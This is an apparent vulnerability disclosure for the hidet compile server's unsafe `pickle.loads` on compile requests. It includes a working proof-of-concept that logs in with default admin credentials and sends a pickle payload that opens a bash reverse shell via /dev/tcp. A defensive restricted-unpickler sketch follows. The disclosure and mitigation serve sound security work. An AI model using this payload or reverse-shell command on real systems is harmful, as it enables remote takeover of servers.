# hidet - pickle.loads

**Describe the bug**

In `apps/compile_server/resources/compilation.py`, line 126, after passing the compile server's validation, there is a risk of a Python deserialization attack, which can achieve command execution, etc.

**Additional context**

```python
import pickle
import base64
import requests
import json


class System(object):
    """Create os.system command"""

    def __reduce__(self):
        import os
        return (os.system, ('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',))


code = System()
data1 = pickle.dumps(code)
print(base64.b64encode(data1))

# default username and password
auth_data = """{
    "username": "admin",
    "password": "admin_password"
}"""
auth_header = {
    "content-type": "application/json"
}
auth_url = "http://100.92.79.102:3281/auth"

# authenticate to obtain a bearer token
auth_res = requests.post(auth_url, data=auth_data, headers=auth_header)
print(auth_res.text)
token = json.loads(auth_res.text)

headers = {
    "authorization": "Bearer " + token["access_token"]
}

# the raw pickle is sent as the body of the /compile request
res = requests.post('http://100.92.79.102:3281/compile', headers=headers, data=data1)
print(res.text)
```

![20240327_110919](https://hackmd.io/_uploads/ryzxJGWkR.gif)
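
On the defensive side, the sketch below shows one way to stop a request body from resolving arbitrary callables during unpickling. It is an added example, not hidet's code or its fix. The names `RestrictedUnpickler`, `safe_loads`, `Probe` and `demo`, and the contents of the allowlist, are assumptions made for illustration.

```python
import io
import os
import pickle

# Assumption: hypothetical allowlist of the only globals a legitimate request
# may reference. A real service would list its own request types here.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowlisted."""

    def find_class(self, module, name):
        # find_class is called for each GLOBAL/STACK_GLOBAL opcode, which is
        # how a __reduce__ payload names the callable it wants invoked.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    """Replacement for pickle.loads() on untrusted request bodies."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Constructed, harmless stand-in for a __reduce__ payload (asks for os.getpid)."""

    def __reduce__(self):
        return (os.getpid, ())


def demo():
    benign = pickle.dumps({"job": "compile", "args": [1, 2, 3]})  # constructed sample
    crafted = pickle.dumps(Probe())                               # constructed sample
    loaded = safe_loads(benign)  # plain containers need no globals, so this loads
    try:
        safe_loads(crafted)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True  # the callable lookup was refused before anything ran
    return loaded, blocked


if __name__ == "__main__":
    print(demo())
```

Where the request schema allows it, a data-only format such as JSON removes the problem entirely; the allowlist is for cases where pickle has to stay.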